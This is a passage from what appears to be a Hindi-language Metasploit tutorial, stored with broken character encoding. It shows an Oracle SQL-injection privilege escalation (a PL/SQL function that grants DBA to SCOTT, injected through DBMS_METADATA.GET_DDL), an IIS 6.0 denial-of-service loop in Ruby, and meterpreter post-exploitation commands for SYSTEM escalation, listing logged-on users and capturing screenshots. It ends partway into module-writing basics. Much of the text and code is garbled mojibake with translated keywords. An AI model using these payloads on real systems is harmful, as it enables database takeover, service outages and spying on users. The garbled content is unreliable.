SQL рдЗрдВрдЬреЗрдХреНрд╢рди рдореЙрдбреНрдпреВрд▓ рдЬреНрдЮрд╛рдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИ, рдЗрд╕рдХрд╛ рдЙрдкрдпреЛрдЧ рджрд░реНрдЬ рдХрд░реЗрдВ рдФрд░ рдЕрдирдзрд┐рдХреГрдд рдкрд╣реБрдВрдЪ рдкреНрд░рджрд╛рди рдХрд░реЗрдВред рднреЗрджреНрдпрддрд╛ Oracle 9i рдФрд░ 10g рдХреЛ рдкреНрд░рднрд╛рд╡рд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЬрд╛рдиреА рдЬрд╛рддреА рд╣реИред рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдореЗрдВ рдХрдИ рдореЙрдбреНрдпреВрд▓ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ рдЬреЛ рдУрд░реЗрдХрд▓ рдореЗрдВ рдЬреНрдЮрд╛рдд рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВред рдореЙрдбреНрдпреВрд▓
рдореЙрдбреНрдпреВрд▓ / рд╕рд╣рд╛рдпрдХ / sqli / oracle рдореЗрдВ рдкрд╛рдП рдЬрд╛ рд╕рдХрддреЗ рд╣реИрдВред
рдЖрдЗрдП рдУрд░реЗрдХрд▓ рднреЗрджреНрдпрддрд╛
рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░рддреЗ рд╣реИрдВ
Oracle DBMS_METADATA XML ред рдпрд╣ рднреЗрджреНрдпрддрд╛
DB_USER рд╕реЗ
DB_ADMINISTRATOR (
DBA ) рддрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░
рдмрдврд╝рд╛рдПрдЧреА ред рд╣рдо
dbms_metadata_get_xml рдореЙрдбреНрдпреВрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗ:
msf> рд╕рд╣рд╛рдпрдХ / sqli / oracle / dbms_metadata_get_xml рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
msf> рд╡рд┐рдХрд▓реНрдк рджрд┐рдЦрд╛рдПрдВ
рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдХрд▓реНрдк (рд╕рд╣рд╛рдпрдХ / sqli / oracle / dbms_metadata_get_xml):
рдирд╛рдо рд╡рд░реНрддрдорд╛рди рд╕реЗрдЯрд┐рдВрдЧ рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╡рд░рдг
---- --------------- -------- -----------
DBPASS TIGER рд╣рд╛рдВ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдПред
DBUSER SCOTT рд╣рд╛рдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдПред
рдЖрд░рдПрдЪрдУрдПрд╕рдЯреА рдУрд░реЗрдХрд▓ рд╣реЛрд╕реНрдЯред
RPORT 1521 рд╣рд╛рдБ TNS рдкреЛрд░реНрдЯред
SID ORCL рд╣рд╛рдБ рдХреЗ рд╕рд╛рде рдкреНрд░рдорд╛рдгрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдкреИрд░ред
SQL рдЧреНрд░рд╛рдВрдЯ DBA SCOTT рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдХреЛрдИ SQL рдирд╣реАрдВред
рдбреЗрдЯрд╛рдмреЗрд╕ рдкрд╣рд▓реЗ рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рд╕реНрдХреЙрдЯ рдФрд░ рдЯрд╛рдЗрдЧрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд▓реЙрдЧрд┐рди рдХреА рдЬрд╛рдВрдЪ рдХрд░рддрд╛ рд╣реИред рдЬрдм рдПрдХ рдореЙрдбреНрдпреВрд▓ рдбреЗрдЯрд╛рдмреЗрд╕ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд░реВрдк рдореЗрдВ рд▓реЙрдЧрд┐рди рдкреНрд░рд╛рдкреНрдд рдХрд░рддрд╛ рд╣реИ, рддреЛ рдпрд╣ рдбреЗрдЯрд╛рдмреЗрд╕ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЛ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХреЛрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рддрд╛ рд╣реИред
msf рд╕рд╣рд╛рдпрдХ (dbms_metadata_get_xml)> RHOST 192.168.56.1 рд╕реЗрдЯ рдХрд░реЗрдВ
msf рд╕рд╣рд╛рдпрдХ (dbms_metadata_get_xml)> SQL YES рд╕реЗрдЯ рдХрд░реЗрдВ
msf рд╕рд╣рд╛рдпрдХ (dbms_metadata_get_xml)> рдЪрд▓рд╛рдПрдВ
рдЕрдЧрд▓рд╛ рдореЙрдбреНрдпреВрд▓ рдЬрд┐рд╕реЗ рд╣рдо рдЬрд╛рдВрдЪреЗрдВрдЧреЗ рд╡рд╣ рд╕реЗрд╡рд╛ рд╕реЗ рдЗрдирдХрд╛рд░ (рдбреАрдУрдПрд╕) рд╣рдорд▓реЗ рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рд╣реИред рд╣рдо IIS 6.0 рдореЗрдВ рдПрдХ рд╕рд╛рдзрд╛рд░рдг рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВрдЧреЗ, рдЬреЛ рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдПрдХ POST рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ 40 рд╕реЗ рдЕрдзрд┐рдХ рдЕрдиреБрд░реЛрдз рдкреИрд░рд╛рдореАрдЯрд░ рд╡рд╛рд▓реЗ рд╕рд░реНрд╡рд░ рдХреЛ рдХреНрд░реИрд╢ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рдЗрд╕ рдореЙрдбреНрдпреВрд▓ рдХреЛ IIS 6.0 рдкрд░ рдЪрд▓рдиреЗ рд╡рд╛рд▓реЗ рдПрдХ рдЕрдкреНрд░рдХрд╛рд╢рд┐рдд рд╡рд┐рдВрдбреЛрдЬ 2003 рд╕рд░реНрд╡рд░ рдкрд░ рдкрд░реАрдХреНрд╖рдг рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред рд╣рдо
ms10_065_ii6_asp_dos рдХрд╛ рдЙрдкрдпреЛрдЧ рдПрдХ рдореЙрдбреНрдпреВрд▓ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд░реЗрдВрдЧреЗ:
msf> рд╕рд╣рд╛рдпрдХ / dos / windows / http / ms10_065_ii6_asp_dos рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ
msf рд╕рд╣рд╛рдпрдХ (ms10_065_ii6_asp_dos)> рд╡рд┐рдХрд▓реНрдк рджрд┐рдЦрд╛рдПрдВ
рдореЙрдбреНрдпреВрд▓ рд╡рд┐рдХрд▓реНрдк (рд╕рд╣рд╛рдпрдХ / рдбреЙрд╕ / рд╡рд┐рдВрдбреЛрдЬрд╝ / http / ms10_065_ii6_asp_dos):
рдирд╛рдо рд╡рд░реНрддрдорд╛рди рд╕реЗрдЯрд┐рдВрдЧ рдЖрд╡рд╢реНрдпрдХ рд╡рд┐рд╡рд░рдг
---- --------------- -------- -----------
RHOST рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкрддрд╛
80 рдирд┐рд░реНрдпрд╛рдд рдХрд░реЗрдВ рд╣рд╛рдБ рд▓рдХреНрд╖реНрдп рдкреЛрд░реНрдЯ
URI /page.asp рд╣рд╛рдБ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП URI
VHOST рдирд╣реАрдВ рд╡рд░реНрдЪреБрдЕрд▓ рд╣реЛрд╕реНрдЯ рдирд╛рдо рдЕрдиреБрд░реЛрдзреЛрдВ рдореЗрдВ рдЙрдкрдпреЛрдЧ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП
msf рд╕рд╣рд╛рдпрдХ (ms10_065_ii6_asp_dos)> рд╕реЗрдЯ RHOST 192.168.56.1 RHOST => 192.168.56.1
msf рд╕рд╣рд╛рдпрдХ (ms10_065_ii6_asp_dos)> рдЪрд▓рд╛рдПрдБ
[*] Http://192.168.56.1:80/page.asp рдкрд░ рд╣рдорд▓рд╛ рд░рди рдХрдорд╛рдВрдб рдХреЗ рдмрд╛рдж, рдореЙрдбреНрдпреВрд▓
page.asp рдХреЗ рд░реВрдк рдореЗрдВ URI рдХреЗ рд╕рд╛рде 80 рдкреЛрд░реНрдЯ рдХреЛ HTTP рдЕрдиреБрд░реЛрдз рднреЗрдЬрдХрд░ рд▓рдХреНрд╖реНрдп IIS рд╕рд░реНрд╡рд░ рдкрд░ рд╣рдорд▓рд╛ рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░
рджреЗрдЧрд╛ ред рдореЙрдбреНрдпреВрд▓ рдХреЗ рд╕рдлрд▓ рдирд┐рд╖реНрдкрд╛рджрди рдХреЗ рдкрд░рд┐рдгрд╛рдорд╕реНрд╡рд░реВрдк IIS рд╕рд░реНрд╡рд░ рдХреЗ рд▓рд┐рдП рдкреВрд░реА рддрд░рд╣ рд╕реЗ рд╕реЗрд╡рд╛ рд╕реЗ рдЗрдирдХрд╛рд░ рдХрд░ рджрд┐рдпрд╛ рдЬрд╛рдПрдЧрд╛ред
Orsc рдбреЗрдЯрд╛рдмреЗрд╕ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рджреНрд╡рд╛рд░рд╛ рдкрд░рд┐рднрд╛рд╖рд┐рдд PL / SQL рдлрд╝рдВрдХреНрд╢рди рдЬреЛ SYS рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рддрд╛ рд╣реИ, рдХреЛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рдХреЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ, рдФрд░ рдпрд╣ рдПрдХ рдкреНрд░рд╢рд╛рд╕рдХ рдХреЗ рд░реВрдк
рдореЗрдВ рд╕реНрдХреЙрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЛ рдмрдврд╝рд╛рддрд╛ рд╣реИред
рдЖрдЗрдП рджреЛ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХреЛ рджреЗрдЦреЗрдВред Oracle рдбрд╛рдЯрд╛рдмреЗрд╕ рд╡рд▓реНрдирд░реЗрдмрд┐рд▓рд┐рдЯреА рдмрд╛рдп рд╡рд▓реНрдиреЗрд░реЗрдмрд┐рд▓рд┐рдЯреА,
SYS рдХреЗ рд╕рдВрджрд░реНрдн рдореЗрдВ рдЪрд▓рдиреЗ рд╡рд╛рд▓реЗ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдкрд░рд┐рднрд╛рд╖рд┐рдд
PL / SQL рдлрд╝рдВрдХреНрд╢рди рдХреЛ рдЗрдВрдЬреЗрдХреНрдЯ рдХрд░рдХреЗ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдкреНрд░рд╢рд╛рд╕рдХ рдХреЛ
рд╕реНрдХреЙрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рдЕрдзрд┐рдХрд╛рд░ рдХреЛ рдмрдврд╝рд╛рддрд╛ рд╣реИред
рд╕рдорд╛рд░реЛрд╣ рдХрд╛ рдЙрджрд╛рд╣рд░рдг:
рдХреНрд░рд┐рдПрдЯ рдпрд╛ рд░рд┐рдкреНрд▓рд╛рдИ рдлрдВрдХреНрд╢рди "рд╕реНрдХреЙрдЯ"ред "ATTACK_FUNC" рд╡рд░реНрдЧрд╛ 2 рдСрд░реНрдЯрд┐рдб current_user рдХреЛ рдкреНрд░реЙрдЯреЛ рдСрдЯреЛрдиреЛрдорд╕_рдЯреНрд░рд╛рдВрд╕рд▓реЗрд╢рди рдХреЗ рд░реВрдк рдореЗрдВ рд▓реМрдЯрд╛рддрд╛ рд╣реИ;
рдмреЗрдЧрд┐рди рдПрдХреНрдЬрд╛рдо рдЗрдорд┐рдЯреЗрдб 'рдЧреНрд░реИрдВрдЯ рдбреАрдмреАрдП рдЯреВ рд╕реНрдХреЙрдЪ';
COMMIT;
RETURN '';
рдЕрдВрдд; рдлрд╝рдВрдХреНрд╢рди
рд╕реНрдХреЙрдЯ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ
рдХреЛ рдмрдврд╝рд╛рдПрдЧрд╛ ред
рдЪрдпрдирд┐рдд SYS.DBMS_METADATA.GET_DDL ('' '|| SCOTT.ATTACK_FUNC () ||' '', '')
рджреЛрд╣рд░реА рд╕реЗ; рдХреЛрдб рдХреА рдкрд┐рдЫрд▓реА рд▓рд╛рдЗрдиреЗрдВ рдЗрдВрдЬреЗрдХреНрд╢рди рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рд╕рдордЭрд╛рддреА рд╣реИрдВред рдУрд░реЗрдХрд▓ рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдореЗрдВ рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рдПрдХ рд╡рд┐рд╕реНрддреГрдд рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдкреБрд╕реНрддрдХ / рдЕрдиреБрд╡рд╛рдж рдХреЗ рджрд╛рдпрд░реЗ рд╕реЗ рдкрд░реЗ рд╣реИред
рдЕрдм рдПрдХ рдбреЙрд╕ рдЕрдЯреИрдХ рдореЙрдбреНрдпреВрд▓ рд╣реИ рдЬреЛ IIS 6.0 рд╕рд░реНрд╡рд░ рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддрд╛ рд╣реИред рд╣рдорд▓рд╛рд╡рд░ рдПрдХ POST рдЕрдиреБрд░реЛрдз рднреЗрдЬрддрд╛ рд╣реИ, рдЬрд┐рд╕рдореЗрдВ 40,000 рд╕реЗ рдЕрдзрд┐рдХ рдЕрдиреБрд░реЛрдз рдкреИрд░рд╛рдореАрдЯрд░ рд╢рд╛рдорд┐рд▓ рд╣реЛрддреЗ рд╣реИрдВ, рдФрд░ рдЗрд╕реЗ рдПрдиреНрдХреЛрдбрд┐рдВрдЧ рдкреНрд░рдХрд╛рд░ / x-www-form-urlencoded рдХреЗ рдЕрдиреБрдкреНрд░рдпреЛрдЧ рдХреЗ рд░реВрдк рдореЗрдВ рднреЗрдЬрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣рд╛рдБ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рд╡рд╣ рднрд╛рдЧ рд╣реИ рдЬреЛ рдореЙрдбреНрдпреВрд▓ рдХреЗ рд░реВрдк рдореЗрдВ рдХрд╛рд░реНрдп рдХрд░рддрд╛ рд╣реИ:
рдЕрдм рдПрдХ рдбреЙрд╕ рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдореЙрдбреНрдпреВрд▓ рдкрд░ рд╡рд┐рдЪрд╛рд░ рдХрд░реЗрдВ рдЬреЛ IIS 6.0 рд╕рд░реНрд╡рд░ рдореЗрдВ рднреЗрджреНрдпрддрд╛ рдХрд╛ рд╢реЛрд╖рдг рдХрд░рддрд╛ рд╣реИред рдПрдХ рд╣рдорд▓рд╛рд╡рд░ рдПрдХ POST рдЕрдиреБрд░реЛрдз рднреЗрдЬрддрд╛ рд╣реИ рдЬрд┐рд╕рдореЗрдВ 40,000 рд╕реЗ рдЕрдзрд┐рдХ рдЕрдиреБрд░реЛрдз рдкреИрд░рд╛рдореАрдЯрд░ рд╢рд╛рдорд┐рд▓ рд╣реЛрддреЗ рд╣реИрдВ рдФрд░ рдкреНрд░рдкрддреНрд░
рдПрдкреНрд▓рд┐рдХреЗрд╢рди / x-www-form-urlencoded рдореЗрдВ рдПрдиреНрдХреЛрдбрд┐рдВрдЧ рдкреНрд░рдХрд╛рд░ рднреЗрдЬрддрд╛ рд╣реИред
рдЬрдмрдХрд┐ (1)
рд╢реБрд░реВ рдХрд░рдирд╛
рдХрдиреЗрдХреНрдЯ
рдкреЗрд▓реЛрдб = "C = A &" * 40,000
рд▓рдВрдмрд╛рдИ = рдкреЗрд▓реЛрдб.рд╕рд╛рдЗрдЬ
sploit = тАЛтАЛ"HEAD # {рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['URI']} HTTP / 1.1 \ r \ n"
sploit << "рд╣реЛрд╕реНрдЯ: # {рдбреЗрдЯрд╛рд╕реНрдЯреЛрд░ ['VHOST'] || rhost} \ r \ n"
sploit << "рдХрдиреЗрдХреНрд╢рди: Close \ r \ n"
sploit << "рд╕рд╛рдордЧреНрд░реА-рдкреНрд░рдХрд╛рд░: рдЕрдиреБрдкреНрд░рдпреЛрдЧ / x-www-form-urlencoded \ r \ n"
sploit << "рд╕рд╛рдордЧреНрд░реА-рд▓рдВрдмрд╛рдИ: # {рд▓рдВрдмрд╛рдИ} \ r \ n \ r \ n"
sploit << рдкреЗрд▓реЛрдб
sock.put (sploit)
#print_status ("DoS рдкреИрдХреЗрдЯ рднреЗрдЬрд╛ рдЧрдпрд╛ред")
рдбрд┐рд╕реНрдХрдиреЗрдХреНрдЯ
рдмрдЪрд╛рд╡ рдПрд░реНрдиреЛ :: ECONNRESET
рдЕрдЧрд▓рд╛
рдЕрдВрдд
рдЕрдВрдд рдЬреИрд╕рд╛ рдХрд┐ рдЖрдк рджреЗрдЦ рд╕рдХрддреЗ рд╣реИрдВ, рд╕реНрдХреНрд░рд┐рдкреНрдЯ 40,000 рд╕реЗ рдЕрдзрд┐рдХ рдХрд╛ рдкреЗрд▓реЛрдб рдЖрдХрд╛рд░ рдЙрддреНрдкрдиреНрди рдХрд░рддреА рд╣реИред рдлрд┐рд░ IIS рд╕рд░реНрд╡рд░ рдкрд░ HTTP рдЕрдиреБрд░реЛрдз рднреЗрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдкреЛрд░реНрдЯ 80 рдкрд░ рдПрдХ рдХрдиреЗрдХреНрд╢рди рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЕрдиреБрд░реЛрдз рд╕рд░реНрд╡рд░ рдкрд░ рд╕реНрдерд╛рдирд╛рдВрддрд░рд┐рдд рд╣реЛ рдЬрд╛рдиреЗ рдХреЗ рдмрд╛рдж, рдпрд╣ рдХреНрд░реИрд╢ рд╣реЛ рдЬрд╛рдПрдЧрд╛ рдФрд░ рдХрд╛рдо рдХрд░рдирд╛ рдмрдВрдж рдХрд░ рджреЗрдЧрд╛ред
рд╕рдВрдЪрд╛рд▓рди рдХреЗ рдмрд╛рдж рдХреЗ рдореЙрдбреНрдпреВрд▓
рд╣рдорд╛рд░реЗ рдкрд╛рд╕ рдореЙрдбреНрдпреВрд▓реЛрдВ рдХреА рдПрдХ рдЕрд▓рдЧ рд╕рдорд░реНрдкрд┐рдд рд╕реВрдЪреА рд╣реИ рдЬреЛ рд╣рдорд╛рд░реЗ рдХреМрд╢рд▓ рдХреЛ рдкреЗрдВрдЯреЗрд╕реНрдЯ рдореЗрдВ рд╕реБрдзрд╛рд░ рд╕рдХрддреА рд╣реИред рдЪреВрдВрдХрд┐ рд╡реЗ рдкреЛрд╕реНрдЯ-рдСрдкрд░реЗрд╢рдирд▓ рдореЙрдбреНрдпреВрд▓ рд╣реИрдВ, рд╣рдореЗрдВ рдПрдХ рд▓рдХреНрд╖реНрдп рдХреЗ рд╕рд╛рде рдПрдХ рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреАред рд╣рдо рд▓рдХреНрд╖реНрдп рддрдХ рдкрд╣реБрдБрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдкрд┐рдЫрд▓реЗ рдЕрдзреНрдпрд╛рдпреЛрдВ рдореЗрдВ рд╡рд░реНрдгрд┐рдд рдХрд┐рд╕реА рднреА рдкрджреНрдзрддрд┐ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред
рдкреЛрд╕реНрдЯ-рдореЙрдбреНрдпреВрд▓ - рд╕рдмрд╕реЗ рджрд┐рд▓рдЪрд╕реНрдк рдФрд░ рд╕реБрд╡рд┐рдзрд╛рдЬрдирдХ рдХрд╛рд░реНрдпреЛрдВ рдХрд╛ рдПрдХ рд╕рдВрдЧреНрд░рд╣ рдЬрд┐рд╕реЗ рдЖрдк рдкреНрд░рд╡реЗрд╢ рдкрд░реАрдХреНрд╖рдг рдХреЗ рджреМрд░рд╛рди рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдЖрдЗрдП рдЬрд▓реНрджреА рд╕реЗ рдЙрдирдореЗрдВ рд╕реЗ рдХреБрдЫ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░реЗрдВред рд╣рдо рдПрдХ рд╕рдХреНрд░рд┐рдп рдореАрдЯрд░рдкрд░реЗрдЯрд░ рд╕рддреНрд░ рдХреЗ рд╕рд╛рде рдЕрдЦрдВрдб рд╡рд┐рдВрдбреЛрдЬ 7 рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВрдЧреЗред
рдЪрд▓реЛ рд╕рд░рд▓
enum_logged_on_users рдореЙрдбреНрдпреВрд▓ рд╕реЗ рд╢реБрд░реВ рдХрд░рддреЗ рд╣реИрдВред рдпрд╣ рд╡рд┐рдВрдбреЛрдЬ рдореЗрдВ рд▓реЙрдЧ рдЗрди рдХрд┐рдП рдЧрдП рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛рдУрдВ рдХреА рдПрдХ рд╕реВрдЪреА рджрд┐рдЦрд╛рддрд╛ рд╣реИред
рдореАрдЯрд░рдкрд╛рдЗрдВрдЯрд░> рдЧреЗрдЯрд┐рд╕реНрдЯрдо
... рд╕рд┐рд╕реНрдЯрдо рдорд┐рд▓рд╛ (рддрдХрдиреАрдХ 4 рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ)ред
meterpreter> рд░рди рдкреЛрд╕реНрдЯ / рд╡рд┐рдВрдбреЛ / рдЗрдХрдЯреНрдард╛ / enum_logged_on_users
[*] рд╕рддреНрд░ рез рдХреЗ рдЦрд┐рд▓рд╛рдл рдЪрд▓ рд░рд╣рд╛ рд╣реИ
рд╡рд░реНрддрдорд╛рди рд▓реЙрдЧ рдЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛
====================
SID рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛
--- ----
S-1-5-21-2350281388-457184790-407941598 DARKLORD-PC \ DARKLORD
рд╣рд╛рд▓ рд╣реА рдореЗрдВ рд▓реЙрдЧ рдЗрди рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛
=====================
SID рдкреНрд░реЛрдлрд╝рд╛рдЗрд▓ рдкрде
--- ------------
S-1-5-18% systemroot% \ system32 \ config \ systemprofile
S-1-5-19 C: \ Windows \ ServiceProfiles \ LocalService
S-1-5-20 C: \ Windows \ ServiceProfiles \ NetworkService
S-1-5-21-23502 C: \ Users \ DARKLORD
S-1-5-21-235 C: \ Users \ Winuser
рдореЙрдбреНрдпреВрд▓ рдХрд╛ рд╕рдлрд▓ рдирд┐рд╖реНрдкрд╛рджрди рд╣рдореЗрдВ рджреЛ рдЯреЗрдмрд▓ рджрд┐рдЦрд╛рддрд╛ рд╣реИред рдкрд╣рд▓реА рддрд╛рд▓рд┐рдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЛ рд▓реЙрдЧ рдЗрди рджрд┐рдЦрд╛рддреА рд╣реИ, рдФрд░ рджреВрд╕рд░реА рддрд╛рд▓рд┐рдХрд╛ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдореЗрдВ рд╣рд╛рд▓ рд╣реА рдореЗрдВ рд▓реЙрдЧ рдЗрди рджрд┐рдЦрд╛рддреА рд╣реИред
рдПрдХ рдФрд░ рдЙрджрд╛рд╣рд░рдг рд▓реАрдЬрд┐рдПред рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рдкреЛрд╕реНрдЯ-рдореЙрдбреНрдпреВрд▓ рд╣реИ рдЬреЛ рд▓рдХреНрд╖реНрдп рдорд╢реАрди рдкрд░ рд╕реНрдХреНрд░реАрди рдХрд╛ рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рд▓реЗрддрд╛ рд╣реИред
meterpreter> рд░рди рдкреЛрд╕реНрдЯ / рд╡рд┐рдВрдбреЛ / рдЗрдХрдЯреНрдард╛ / screen_spy
[*] Explorer.exe рдкрд┐рдб рдХреА рдУрд░ рдкрд▓рд╛рдпрди: резрезрежрек
[*] рдкреНрд░рд╡рд╛рд╕ рд╕рдлрд▓
[*] 5 рд╕реЗрдХрдВрдб рдХреА рджреЗрд░реА рд╕реЗ 60 рд╕реНрдХреНрд░реАрдирд╢реЙрдЯ рдХреИрдкреНрдЪрд░ рдХрд░рдирд╛
рдЖрдк
рдореЙрдбреНрдпреВрд▓ / рдкреЛрд╕реНрдЯ / рд╡рд┐рдВрдбреЛ / рдЗрдХрдЯреНрдард╛ рдореЗрдВ
enum_logged_on_user.rb рдФрд░
screen_spy.rb рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдХрд╛ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд░ рд╕рдХрддреЗ
рд╣реИрдВ ред рд╡реЗ рдЖрдкрдХреЛ рдпрд╣ рдкрддрд╛ рд▓рдЧрд╛рдиреЗ рдореЗрдВ рдорджрдж рдХрд░реЗрдВрдЧреЗ рдХрд┐ рдпреЗ рдореЙрдбреНрдпреВрд▓ рдХреИрд╕реЗ рдХрд╛рдо рдХрд░рддреЗ рд╣реИрдВред
рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдиреЗ рдХреА рдореВрд▓ рдмрд╛рддреЗрдВ
рдЕрдкрдирд╛ рдЦреБрдж рдХрд╛ рдореЙрдбреНрдпреВрд▓ рдмрдирд╛рдирд╛ рд╢реБрд░реВ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рд╣рдореЗрдВ рд░реВрдмреА рдХреЗ рдмреБрдирд┐рдпрд╛рджреА рдЬреНрдЮрд╛рди рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИред рд╣рдордиреЗ рдкрд╣рд▓реЗ рд╣реА рд░реВрдмреА рдХреЗ рдЙрдкрдпреЛрдЧ рдФрд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдкрд░ рдЪрд░реНрдЪрд╛ рдХреА рд╣реИред
рдЖрдЗрдП рдмреБрдирд┐рдпрд╛рджреА рдмрд╛рддреЛрдВ рд╕реЗ рд╢реБрд░реВ рдХрд░реЗрдВред рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдХреЗ рд▓рд┐рдП рдореЙрдбреНрдпреВрд▓ рдХреЛ рдкрдардиреАрдп рд╣реЛрдиреЗ рдХреЗ рд▓рд┐рдП, рдЖрдкрдХреЛ MSF рдкреБрд╕реНрддрдХрд╛рд▓рдпреЛрдВ рдХреЛ рдЖрдпрд╛рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:
рдЖрд╡рд╢реНрдпрдХрддрд╛ 'msf / рдХреЛрд░'
рдпрд╣ рд░реЗрдЦрд╛ рдЗрдВрдЧрд┐рдд рдХрд░рддреА рд╣реИ рдХрд┐ рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рдореЗрдЯрд╛рд╕реНрдкреНрд▓реЛрдЗрдЯ рдврд╛рдВрдЪреЗ рдХреЗ рд╕рднреА рдирд┐рд░реНрднрд░рддрд╛ рдФрд░ рдХрд╛рд░реНрдп рд╢рд╛рдорд┐рд▓ рд╣реЛрдВрдЧреЗред
рд╡рд░реНрдЧ Metasploit3 <Msf :: рд╕рд╣рд╛рдпрдХ
